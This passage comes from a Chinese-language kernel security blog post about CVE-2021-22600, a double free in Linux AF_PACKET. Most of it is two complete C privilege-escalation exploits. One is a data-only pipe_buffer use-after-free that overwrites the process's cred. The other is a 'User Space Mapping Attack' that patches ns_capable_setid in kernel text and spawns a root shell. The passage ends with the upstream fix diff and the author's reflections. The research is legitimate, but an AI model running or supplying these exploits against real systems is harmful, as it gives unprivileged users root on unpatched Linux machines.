        /* expanding the pipe reallocates its pipe_buffer array in kmalloc-1k */
        if (fcntl(pipe_fd[i][0], F_SETPIPE_SZ, PIPE_FCNTL_SZ) < 0) {
            perror("[x] Failed to do fcntl on pipe");
            printf("[x] Unable to expand %d pipe_buffer\n", i);
            err_exit("FAILED to spray pipe_buffer!");
        }

        /* reclaim original pipe_buffer */
        if (write_msg(msg_queue[i % MSG_QUEUE_NR], buf, PIPE_RECLAIM_SZ, 0x3361626e74747261) < 0) {
            err_exit("FAILED to reclaim pipe_buffer back!");
        }

        garbage_msgs[i % MSG_QUEUE_NR]++;
    }

    log_info("[*] Triggerring double free and spraying half of pipe_buffer...");

    /* THE BUG: freeing under V2 after a V3 alloc/free double-frees the
     * object now in use as some pipe's pipe_buffer array */
    send_cmd_to_child(CMD_SET_VERSION_V2);
    send_cmd_to_child(CMD_FREE_RX_RING);

    for (int i = (PIPE_SPRAY_NR / 2); i < PIPE_SPRAY_NR; i++) {
        if (fcntl(pipe_fd[i][0], F_SETPIPE_SZ, PIPE_FCNTL_SZ) < 0) {
            perror("[x] Failed to do fcntl on pipe");
            printf("[x] Unable to expand %d pipe_buffer\n", i);
            err_exit("FAILED to spray pipe_buffer!");
        }

        if (write_msg(
            msg_queue[i % MSG_QUEUE_NR],
            buf,
            PIPE_RECLAIM_SZ,
            0x3361626e74747261
        ) < 0) {
            err_exit("FAILED to reclaim pipe_buffer back!");
        }

        garbage_msgs[i % MSG_QUEUE_NR]++;

        /* probe: if pipe j now returns pipe i's identifier, they share
         * one pipe_buffer array -> UAF pair found */
        for (int j = 0; j < i; j++) {
            int nr;

            /* at this time, cpu slab is victim pipe_buffer, so no more spray */
            read(pipe_fd[j][0], &nr, sizeof(nr));
            if (nr != j && nr == i) {
                orig_idx = nr;
                victim_idx = j;
                goto out_pipe;
            }
            write(pipe_fd[j][1], &nr, sizeof(nr));
        }
    }

out_pipe:
    if (orig_idx < 0 || victim_idx < 0) {
        err_exit("FAILED to construct UAF on pipe!");
    }

    log_success("[+] Successfully made UAF on pipe_buffer!");
    printf("[+] Original: %d, victim: %d\n", orig_idx, victim_idx);

    /* closing the original frees the shared array -> victim pipe is UAF */
    close(pipe_fd[orig_idx][1]);
    close(pipe_fd[orig_idx][0]);

    log_info("[*] Crafting pipe_buffer overlapped with msg_msgseg...");

    if (pipe(uaf_pipe) < 0) {
        err_exit("FAILED to allocate new pipe for UAF!");
    }

    /* move to pipe_buffer[1] */
    write(uaf_pipe[1], "arttnba3", 8);
    read(uaf_pipe[0], buf, 8);
    write(uaf_pipe[1], "arttnba3", 8);

    close(pipe_fd[victim_idx][1]);
    close(pipe_fd[victim_idx][0]);

    /* msg_msgseg of this message reclaims the freed pipe_buffer array */
    memset(buf, 0, sizeof(buf));
    if (write_msg(msg_queue[ATK_QUEUE_IDX], buf, MSG_EVIL_SZ, 0x400) < 0) {
        err_exit("FAILED to create msg_msg with msg_msgseg!");
    }

    /**
     * at this time the pipe was thought to be empty at buf[1],
     * so then the new page will be granted on the buf[2]
     */
    write(uaf_pipe[1], "arttnba3", 8);

    if (read_msg(msg_queue[ATK_QUEUE_IDX], buf, MSG_EVIL_SZ, 0x400) < 0){
        err_exit("FAILED to read msg_msg and msg_msgseg!");
    }

    /*
    for (int i = 0; i < MSG_EVIL_SZ / 8; i++) {
        printf("[----data-dump----][%d] %lx\n", i, buf[i]);
    }
    */

    /* the msg data now contains a live pipe_buffer: leak page & ops */
    leak_pipe_buf = (void*) &buf[516];

    printf(
        SUCCESS_MSG("[+] Leak pipe_buffer::page ") "%p"
        SUCCESS_MSG(", pipe_buffer::ops ") "%p\n",
        leak_pipe_buf->page,
        leak_pipe_buf->ops
    );

    pipe_ops = (void*) leak_pipe_buf->ops;

    /* struct page pointers live above vmemmap_base; mask to its granularity */
    vmemmap_base = (size_t) leak_pipe_buf->page & KASLR_MASK;
    log_info("[*] Try to guess vmemmap_base...");
    printf("[*] Starts from %lx...\n", vmemmap_base);

    if (write_msg(msg_queue[ATK_QUEUE_IDX], buf, MSG_EVIL_SZ, 0x400) < 0) {
        err_exit("FAILED to create msg_msg with msg_msgseg!");
    }

    /* physical 0x9d000 holds a pointer to secondary_startup_64; reading the
     * struct page for that pfn validates a vmemmap_base guess */
    arbitrary_read_by_pipe(vmemmap_base + 0x9d000 / 0x1000 * 0x40, buf);

    kernel_leak = buf[0];
    /*
    for (int i = 0; i < 0xff0 / 8; i++) {
        printf("[----data-dump----][%d] %lx\n", i, buf[i]);
    }
    */

    for (int loop_nr = 0; 1; loop_nr++) {
        if (kernel_leak > 0xffffffff81000000
            && (kernel_leak & 0xfff) < 0x100) {
            kernel_base = kernel_leak & 0xfffffffffffff000;
            if (loop_nr != 0) {
                puts("");
            }
            printf(
                INFO_MSG("[*] Leak secondary_startup_64 : ") "%lx\n",kernel_leak
            );
            printf(SUCCESS_MSG("[+] Got kernel base: ") "%lx\n", kernel_base);
            printf(SUCCESS_MSG("[+] Got vmemmap_base: ") "%lx\n", vmemmap_base);
            break;
        }

        for (int i = 0; i < 80; i++) {
            putchar('\b');
        }
        printf(
            "[No.%d loop] Got unmatched data: %lx, keep looping...",
            loop_nr,
            kernel_leak
        );

        /* wrong guess: step down one KASLR granule and retry */
        vmemmap_base -= KASLR_GRANULARITY;
        arbitrary_read_by_pipe(
            vmemmap_base + 0x9d000 / 0x1000 * 0x40,
            buf
        );

        kernel_leak = buf[0];
    }

    log_info("[*] Seeking task_struct in kernel space...");

    /* unique comm marker so we can grep physical memory for our task */
    prctl(PR_SET_NAME, "arttnba3pwnn");
    uid = getuid();
    gid = getgid();

    for (int i = 0; 1; i++) {
        arbitrary_read_by_pipe(vmemmap_base + i * 0x40, buf);

        /* task_struct layout: real_cred and cred sit just before comm[] */
        comm_addr = memmem(buf, 0xff0, "arttnba3pwnn", 12);
        if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
            && (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
            && (comm_addr[-2] == comm_addr[-3])) { /* should be equal */

            printf(
                SUCCESS_MSG("[+] Found task_struct on page: ") "%lx\n",
                (vmemmap_base + i * 0x40)
            );
            printf(SUCCESS_MSG("[+] Got cred address: ") "%lx\n",comm_addr[-2]);

            cred_kaddr = comm_addr[-2];
            cred_data = (void*) (cred_data_buf + (cred_kaddr & (0x1000 - 1)));
            page_offset_base = cred_kaddr & KASLR_MASK;

            /* guess page_offset_base by checking that the candidate page
             * really contains our uid/gid at the cred offset */
            while (1) {
                cred_kpage_addr = vmemmap_base + (cred_kaddr - page_offset_base) / 0x1000 * 0x40;

                arbitrary_read_by_pipe(
                    cred_kpage_addr,
                    cred_data_buf
                );
                if (cred_data->uid == uid
                    && cred_data->gid == gid) {
                    printf(
                        SUCCESS_MSG("[+] Got page_offset_base: ") "%lx\n",
                        page_offset_base
                    );
                    printf(
                        SUCCESS_MSG("[+] Found cred on page: ") "%lx\n",
                        cred_kpage_addr
                    );
                    break;
                }

                page_offset_base -= KASLR_GRANULARITY;
                puts("[?] Looping!?");
            }

            break;
        }
    }

    puts("[*] Overwriting cred and granting root privilege...");

    /* data-only: write uid = gid = 0 straight into our cred page */
    cred_data->uid = 0;
    cred_data->gid = 0;

    arbitrary_write_by_pipe(
        cred_kpage_addr,
        cred_data_buf,
        0xff0
    );

    setresuid(0, 0, 0);
    setresgid(0, 0, 0);

    get_root_shell();
}

/* Entry point: the whole attack lives in exploitation(). */
int main(int argc, char **argv, char **envp)
{
    (void) argc;
    (void) argv;
    (void) envp;

    exploitation();

    return 0;
}

运行即可完成提权,不依赖具体内核镜像的 data-only 攻击只能说是非常舒服了,不过有小概率会没法完成 cross cache 而利用失败:

Exploit:User Space Mapping Attack

这是 360 漏洞安全研究院的 Alpha Lab 在 BlackHat 上给出的一种有点意思的解法,笔者在 d3kcache 给出的第三种利用方法中使用了这种技术的本质,这里来讲一讲这种解法的源头——也就是 Alpha Lab 给 CVE-2021-22600 这个漏洞的预期解法

主要是利用了 pgv 结构体本身的特性:

  • 既然 packet socket 给我们提供了 mmap 映射 pgv 中页面的权能,我们不难想到的是我们可以通过 UAF 漏洞利用其他结构体来改写 pgv 为内核中的其他页面,再通过 mmap 映射到用户空间从而直接完成对内核数据的改写
  • packet socket 的页面映射中存在对页面类型的检查,但是内核镜像部分可以完美通过检查,因此我们可以直接改写内核代码段完成恶意代码执行,比较容易想到的是修改 ns_capable_setid 这个在 setresuid() 中进行权限检查的函数使其永远返回检查通过,从而让我们能够直接修改自身 uid gid
  • 对于内核地址的泄漏还是老办法:先读出堆上地址,然后根据 KASLR 的粒度去猜 page_offset_base ,如果在 page_offset_base + 0x9d000 找到一个指向 secondary_startup_64 的指针那内核代码段基地址就有了,之后把 pgv[0] 改成 ns_capable_setid 后 mmap 修改即可

这里有一点需要注意的是 我们不能在 pgv 中长期持有指向内核代码段的指针 (因为会有个 非常sb的 定时器做检查),因此我们需要在 mmap 修改完之后马上 munmap 再用 sk_buffpgv[0] 修改回原值,否则会因为定时器尝试读写 pgv[0] 指向的 kernel 代码段而导致 kernel crash:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
/**
* Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stddef.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/mman.h>

#ifndef IS_ERR
/*
 * Linux-kernel-style error-pointer check: "pointers" in the top 4095 bytes
 * of the address space encode negative errno values. The argument is
 * parenthesized so the macros stay correct for arbitrary expressions
 * (the original `(uintptr_t) ptr` would mis-bind for e.g. `base + off`).
 * Note: uintptr_t/intptr_t come from <stdint.h>; include it if these
 * macros are ever expanded (they are currently unused in this file).
 */
#define IS_ERR(ptr) ((uintptr_t) (ptr) >= (uintptr_t) -4095UL)
#endif

#ifndef PTR_ERR
/* Recover the negative errno encoded in an error pointer. */
#define PTR_ERR(ptr) ((int) (intptr_t) (ptr))
#endif

/* ANSI color wrappers for log output (green / blue / red, bold). */
#define SUCCESS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg) puts(SUCCESS_MSG(msg))
#define log_info(msg) puts(INFO_MSG(msg))
#define log_error(msg) puts(ERR_MSG(msg))

/* KASLR randomizes region bases in 256 MiB steps; used for guess loops */
#define KASLR_GRANULARITY 0x10000000
#define KASLR_MASK (~(KASLR_GRANULARITY - 1))
/* no-KASLR defaults, refined at runtime from leaked pointers */
size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;

/* Print a fatal error, linger 5s so the message is visible, then exit. */
void err_exit(char *msg)
{
    printf(ERR_MSG("[x] Error at: ") "%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

/*
 * Verify that euid is now 0 and spawn an interactive root shell.
 * Never returns: exits whether or not privilege escalation succeeded.
 */
void get_root_shell(void)
{
    if(getuid()) {
        log_error("[x] Failed to get the root!");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    log_success("[+] Successful to get the root.");
    log_info("[*] Execve root shell now...");

    system("su root -c sh");

    /* to exit the process normally, instead of potential segmentation fault */
    exit(EXIT_SUCCESS);
}

/**
 * Pin the calling process to a single CPU core so that all per-CPU
 * slab/freelist manipulation during the exploit happens on one cache.
 */
void bind_core(int core)
{
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(core, &mask);
    sched_setaffinity(getpid(), sizeof(mask), &mask);

    printf(INFO_MSG("[*] Process binded to core: ") "%d\n", core);
}

/**
 * Enter fresh user/mount/net namespaces and map the current uid/gid to
 * root inside them; this grants the CAP_NET_RAW needed for AF_PACKET.
 */
void unshare_setup(void)
{
    char map_buf[0x100];
    int fd;

    unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

    /* setgroups must be denied before gid_map may be written */
    fd = open("/proc/self/setgroups", O_WRONLY);
    write(fd, "deny", strlen("deny"));
    close(fd);

    fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(map_buf, sizeof(map_buf), "0 %d 1", getuid());
    write(fd, map_buf, strlen(map_buf));
    close(fd);

    fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(map_buf, sizeof(map_buf), "0 %d 1", getgid());
    write(fd, map_buf, strlen(map_buf));
    close(fd);
}

/* Print the exploit banner (output is byte-identical to the original). */
void print_banner(void)
{
    printf(SUCCESS_MSG("--------- CVE-2021-22600 Exploitation ---------") "\n");
    printf(INFO_MSG("-------\t\t Author: ") "arttnba3" INFO_MSG(" \t-------") "\n");
    printf(SUCCESS_MSG("--------- User Space Mapping Attack ---------\n") "\n");
}

/*
 * Userland copy of the kernel's tpacket_req3 layout (setsockopt argument
 * for PACKET_RX_RING / PACKET_TX_RING); the last three fields are only
 * consumed for TPACKET_V3 sockets.
 */
struct tpacket_req {
    unsigned int tp_block_size;
    unsigned int tp_block_nr;
    unsigned int tp_frame_size;
    unsigned int tp_frame_nr;
    unsigned int tp_retire_blk_tov;
    unsigned int tp_sizeof_priv;
    unsigned int tp_feature_req_word;
};

/* Ring-buffer protocol versions selectable via PACKET_VERSION. */
enum tpacket_versions {
    TPACKET_V1,
    TPACKET_V2,
    TPACKET_V3,
};

/* SOL_PACKET socket option numbers (from <linux/if_packet.h>). */
#define PACKET_RX_RING 5
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

/* Target slab size: pgv / rx_owner_map land in kmalloc-512..1k range. */
#define VICTIM_OBJ_SZ (512 + 8)

/* sk_buff payload size that reclaims the same slab object as the pgv. */
#define SKBUFF_DATA_SZ (VICTIM_OBJ_SZ)

/* Ring geometry: pg_vec holds TP_BLK_NR page pointers == VICTIM_OBJ_SZ bytes. */
#define TP_BLK_SZ 0x1000
#define TP_BLK_NR (VICTIM_OBJ_SZ / sizeof(char*))
#define TP_FRAME_SZ TP_BLK_SZ
#define TP_FRAME_NR (TP_BLK_SZ * TP_BLK_NR / TP_FRAME_SZ)

/* Image-specific address of ns_capable_setid() (no-KASLR base);
 * makes this exploit depend on the exact kernel build. */
#define NS_CAPABLE_SETID 0xffffffff810bc5c0

/* parent->child and child->parent notification pipes */
int p2c_pipe[2], c2p_pipe[2];

/**
 * Child process performing the whole USMA attack. Flow:
 *   1. create the AF_PACKET socket in fresh namespaces (CAP_NET_RAW);
 *   2. alloc + free a V3 RX ring, leaving a dangling rx_owner_map record;
 *   3. reclaim the freed object as sk_buff data, then trigger the
 *      V2-free / V3-realloc so the same memory is both an sk_buff payload
 *      and the socket's pgv page-pointer array (double booking);
 *   4. read the sk_buff to leak a page pointer, guess page_offset_base and
 *      kernel base by repeatedly rewriting pgv[0] and mmap()ing the ring;
 *   5. point pgv[0] at ns_capable_setid, mmap it, patch it to return 1;
 *   6. restore pgv[0] (a kernel timer walks pgv — leaving a code-segment
 *      pointer there would crash), then signal the parent and sleep.
 *
 * Statement order is load-bearing throughout; never returns.
 */
void exploitation_child(void)
{
    struct tpacket_req req;
    int socket_fd, version;
    size_t buf[0x1000], *pgv_region, kernel_leak, orig_page;
    char *kcode_map;
    int sk_socket[2];
    int ret = 0;

    unshare_setup();

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket) < 0) {
        perror("[x] Unable to create socket pair");
        err_exit("FAILED at creating socket pair!");
    }

    log_info("[*] Creating packet socket...");

    socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socket_fd < 0) {
        log_error("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)");
        err_exit("FAILED to create socket");
    }

    log_info("[*] Set socket version to TPACKET_V3...");

    version = TPACKET_V3;
    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
                     &version, sizeof(version));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_VERSION)");
        err_exit("FAILED to use setsockopt to set TPACKET_V3");
    }

    log_info("[*] Allocating RX ring buffer...");

    memset(&req, 0, sizeof(req));
    req.tp_block_size = TP_BLK_SZ;
    req.tp_block_nr = TP_BLK_NR;
    req.tp_frame_size = TP_FRAME_SZ;
    req.tp_frame_nr = TP_FRAME_NR;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
    if (ret < 0) {
        perror("[x] failed at setsockopt(PACKET_RX_RING)");
        err_exit("FAILED to allocate RX ring buffer");
    }

    log_info("[*] Freeing RX ring buffer...");

    /* tp_block_nr == 0 frees the ring; the marker values are ignored */
    req.tp_block_size = 0x3361626e;
    req.tp_block_nr = 0;
    req.tp_frame_size = 0x74747261;
    req.tp_frame_nr = 0;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
    if (ret < 0) {
        perror("[x] failed at setsockopt(PACKET_RX_RING)");
        err_exit("FAILED to free RX ring buffer");
    }

    log_info("[*] Allocating pgv and free to reclaim as sk_buff...");

    /* the freed object becomes this sk_buff's data buffer */
    if (write(sk_socket[0], buf, SKBUFF_DATA_SZ) < 0) {
        perror("[x] Unable to write sk_sockets");
        err_exit("FAILED to allocate sk_buff to reclaim pgv back!");
    }

    log_info("[*] Free in V2 and reallocate pgv in V3...");

    /* the vulnerable V2 free releases the object again... */
    version = TPACKET_V2;
    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
                     &version, sizeof(version));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_VERSION)");
        err_exit("FAILED to use setsockopt to set TPACKET_V2");
    }

    req.tp_block_size = 0x3361626e;
    req.tp_block_nr = 0;
    req.tp_frame_size = 0x74747261;
    req.tp_frame_nr = 0;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
    if (ret < 0) {
        perror("[x] failed at setsockopt(PACKET_RX_RING)");
        err_exit("FAILED to free RX ring buffer");
    }

    version = TPACKET_V3;
    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
                     &version, sizeof(version));
    if (ret < 0) {
        log_error("[x] failed at setsockopt(PACKET_VERSION)");
        err_exit("FAILED to use setsockopt to set TPACKET_V3");
    }

    /* ...and this realloc makes the same memory the socket's pgv array
     * while it is still owned by the live sk_buff */
    memset(&req, 0, sizeof(req));
    req.tp_block_size = TP_BLK_SZ;
    req.tp_block_nr = TP_BLK_NR;
    req.tp_frame_size = TP_FRAME_SZ;
    req.tp_frame_nr = TP_FRAME_NR;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
    if (ret < 0) {
        perror("[x] failed at setsockopt(PACKET_RX_RING)");
        err_exit("FAILED to allocate RX ring buffer");
    }

    /* reading the sk_buff now dumps the freshly-written pgv page pointers */
    log_info("[*] Try leaking with sk_buff...");
    if (read(sk_socket[1], buf, SKBUFF_DATA_SZ) < 0) {
        perror("[x] Unable to read sk_sockets");
        err_exit("FAILED to read sk_buff to leak data!");
    }

    /*
    for (int i = 0; i < (SKBUFF_DATA_SZ / 8); i++) {
        printf("[----data-dump----][%d] %lx\n", i, buf[i]);
    }
    */

    /* save pgv[0] so we can restore it before the retire timer fires */
    orig_page = buf[0];
    page_offset_base = buf[0] & KASLR_MASK;
    /* physical 0x9d000 holds a pointer to secondary_startup_64 */
    buf[0] = page_offset_base + 0x9d000;

    for (;;) {
        /* rewrite pgv[0] by re-spraying the shared sk_buff data */
        if (write(sk_socket[0], buf, SKBUFF_DATA_SZ) < 0) {
            perror("[x] Unable to write sk_sockets");
            err_exit("FAILED to allocate sk_buff to reclaim pgv back!");
        }

        /* mmap() the ring: pgv[0] now maps our guessed kernel page */
        pgv_region = mmap(NULL, TP_BLK_SZ * TP_BLK_NR, PROT_READ | PROT_WRITE, MAP_SHARED, socket_fd, 0);
        if (pgv_region == MAP_FAILED) {
            perror("[x] Unable to do pgv mapping");
            err_exit("FAILED to map pgv to user space!");
        }

        kernel_leak = pgv_region[0];
        if (kernel_leak > 0xffffffff81000000
            && (kernel_leak & 0xfff) < 0x100) {
            kernel_base = kernel_leak & 0xfffffffffffff000;
            kernel_offset = kernel_base - 0xffffffff81000000;
            printf(
                INFO_MSG("[*] Leak secondary_startup_64 : ") "%lx\n",kernel_leak
            );
            printf(
                SUCCESS_MSG("[+] Got kernel base: ") "%lx"
                SUCCESS_MSG(", kernel offset: ") "%lx\n",
                kernel_base,
                kernel_offset
            );
            printf(SUCCESS_MSG("[+] Got page_offset_base: ") "%lx\n", page_offset_base);
            break;
        }

        /* wrong guess: unmap, drain the sk_buff, step down one granule */
        munmap(pgv_region, TP_BLK_SZ * TP_BLK_NR);

        if (read(sk_socket[1], buf, SKBUFF_DATA_SZ) < 0) {
            perror("[x] Unable to read sk_sockets");
            err_exit("FAILED to read sk_buff to leak data!");
        }

        page_offset_base -= KASLR_GRANULARITY;
        buf[0] = page_offset_base + 0x9d000;
    }

    log_info("[*] Start mapping kernel code segment to user space...");

    munmap(pgv_region, TP_BLK_SZ * TP_BLK_NR);

    if (read(sk_socket[1], buf, SKBUFF_DATA_SZ) < 0) {
        perror("[x] Unable to read sk_sockets");
        err_exit("FAILED to read sk_buff to leak data!");
    }

    /* point pgv[0] at the page containing ns_capable_setid() */
    buf[0] = NS_CAPABLE_SETID + kernel_offset;
    if (write(sk_socket[0], buf, SKBUFF_DATA_SZ) < 0) {
        perror("[x] Unable to write sk_sockets");
        err_exit("FAILED to allocate sk_buff to reclaim pgv back!");
    }

    pgv_region = mmap(NULL, TP_BLK_SZ * TP_BLK_NR, PROT_READ | PROT_WRITE, MAP_SHARED, socket_fd, 0);
    if (pgv_region == MAP_FAILED) {
        perror("[x] Unable to do pgv mapping");
        err_exit("FAILED to map pgv to user space!");
    }

    log_info("[*] Start overwriting kernel code segment...");

    /**
     * The setresuid() check for user's permission by ns_capable_setid(),
     * so we can just patch it to let it always return true :)
     **/
    kcode_map = (char*) pgv_region;
    //memset(kcode_map + (NS_CAPABLE_SETID & 0xfff), '\x90', 0x40); /* nop */
    memcpy(
        kcode_map + (NS_CAPABLE_SETID & 0xfff),
        "\xf3\x0f\x1e\xfa" /* endbr64 */
        "H\xc7\xc0\x01\x00\x00\x00" /* mov rax, 1 */
        "\xc3", /* ret */
        12
    );

    log_info("[*] Restoring the original...");

    /* pgv must not keep pointing into kernel text: a retire timer walks it */
    munmap(pgv_region, TP_BLK_SZ * TP_BLK_NR);
    if (read(sk_socket[1], buf, SKBUFF_DATA_SZ) < 0) {
        perror("[x] Unable to read sk_sockets");
        err_exit("FAILED to read sk_buff to leak data!");
    }

    buf[0] = orig_page;
    if (write(sk_socket[0], buf, SKBUFF_DATA_SZ) < 0) {
        perror("[x] Unable to write sk_sockets");
        err_exit("FAILED to allocate sk_buff to reclaim pgv back!");
    }

    log_info("[*] Notifiying parent process...");

    /* notify the parent */
    write(c2p_pipe[1], "arttnba3", sizeof("arttnba3"));

    /* just to keep the child sleeping... */
    read(p2c_pipe[0], &ret, sizeof(ret));

    sleep(114514);
}

/**
 * Parent side of the USMA exploit: fork the child that patches
 * ns_capable_setid(), wait for its "arttnba3" handshake, then call
 * setresuid(0,0,0) — which now succeeds for everyone — and pop a shell.
 */
void exploitation(void)
{
    char identifier[0x10];
    int ret;

    print_banner();

    bind_core(0);

    log_info("[*] Creating child process to user packet socket...");

    if (pipe(p2c_pipe) < 0 || pipe(c2p_pipe) < 0) {
        perror("[x] Unable to create pipe");
        err_exit("FAILED to create pipe for communication!");
    }

    ret = fork();
    if (!ret) {
        exploitation_child();
        exit(EXIT_SUCCESS);
    } else if (ret < 0) {
        perror("[x] Unable to fork out child process");
        err_exit("FAILED to create child process for exploit!");
    }

    memset(identifier, '\0', sizeof(identifier));
    /* the child sends sizeof("arttnba3") == 9 bytes (NUL included); the
     * original read sizeof("rat3bant") here, which only worked because the
     * two literals happen to be the same length */
    read(c2p_pipe[0], identifier, sizeof("arttnba3"));

    if (strcmp(identifier, "arttnba3")) {
        err_exit("WRONG message got from child.");
    }

    log_info("[*] trigger evil ns_capable_setid() in setresuid()...");

    fflush(stdout);
    sleep(5);

    setresuid(0, 0, 0);
    get_root_shell();

    /* not reached: get_root_shell() always calls exit() */
    system("/bin/sh");
}

/* Entry point: the whole attack lives in exploitation(). */
int main(int argc, char **argv, char **envp)
{
    (void) argc;
    (void) argv;
    (void) envp;

    exploitation();

    return 0;
}

运行即可完成提权,但 依赖于特定的内核镜像中特定内核函数的地址 ,且有一定概率因为定时器而崩溃:

目前笔者想到的可能的优化方法是想办法去找内核代码段在 page_offset_base 上的偏移（也就是内核镜像在物理内存中的加载地址），不过这一块内存大概率会被配置为和内核代码段相同的权限

0x03. 漏洞修复

这个漏洞最终在 这个 commit 当中被修复,修复方式是:

  • rx_owner_map 的释放迁移到与 pg_vec 同步

这确保了 rx_owner_map 与 pg_vec 生命周期的一致性，从而不会被双重释放，不过在笔者看来更要紧的问题是 double booking 的存在，因此笔者个人其实不太满意对这个漏洞的修复止步于此

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
index 46943a18a10d54..76c2dca7f0a594 100644
--- a/net/packet/af_packet.c
+++ b/net/packet/af_packet.c
@@ -4492,9 +4492,10 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
}

out_free_pg_vec:
- bitmap_free(rx_owner_map);
- if (pg_vec)
+ if (pg_vec) {
+ bitmap_free(rx_owner_map);
free_pg_vec(pg_vec, order, req->tp_block_nr);
+ }
out:
return err;
}

0xFF. What’s more…

久违但经典的废话环节

好久没有从头写过比较硬核的漏洞分析与利用的文章了( 是的自从 23 年本科毕业之后笔者就很少有时间去对一个内核漏洞做深入透彻的分析与攻击程式的编写了,而前面几篇漏洞分析其实都很水当然这篇也比较水不过含水量可能稍微少一点毕竟在 exp 中有着笔者认为非常有意思的一些小技巧 ),这又让笔者想起了自己刚学 kernel pwn 的那段时间:2020年~2023年可谓是 Linux 内核利用的飞速发展期,这个阶段在无数安全研究员的共同努力下 kernel pwn 的发展直接击穿了从 SLUB allocator 到 buddy system 的每一处细节,从对不同内核结构的深入解析到各种跨缓存的页级攻击手段,再到随之而来的各种不同的防护与缓解措施, Linux kernel 这一战场间攻防对抗的发展速度似乎已经快到还没开始多久就已经结束了 ,page-level heap fengshui、cross-cache attack、 page-level UAF 等深入内存管理最底层的技术似乎直接在攻击技巧上突破了令人难以想象的极限(DirtyCred、DirtyPageTable、之类的仔细一想不都只是 不同形式的衍生物 么,更别提 SLUBStick 之类的换皮以及 PageJack 这样的 抄袭 之物了 ,是的笔者一直有在尝试和 BlackHat 的主办方 argue 这件事情,虽然情况并不乐观但我仍会坚持下去 ),而 SLAB_VIRTUALCONFIG_RANDOM_KMALLOC_CACHES 等防护手段的出现则更是很多传统攻击方法黯然失色,在 2024 年做个普通的 kernel pwn 似乎各种 data-only attack 已经是标配,没有个不依赖特定内核镜像的说明似乎都拿不出手,攻击程式里没有 heap spray 就好像吃饭不用餐具一样抽象,而传统的返回导向编程似乎早已随着控制流完整性和 shadow stack 与 CET 等技术的出现而被扫入历史的垃圾堆,像 userland pwn 一样伪造 freelist 分配 fake chunk 的方法更是早已销声匿迹—— 但接下来呢?

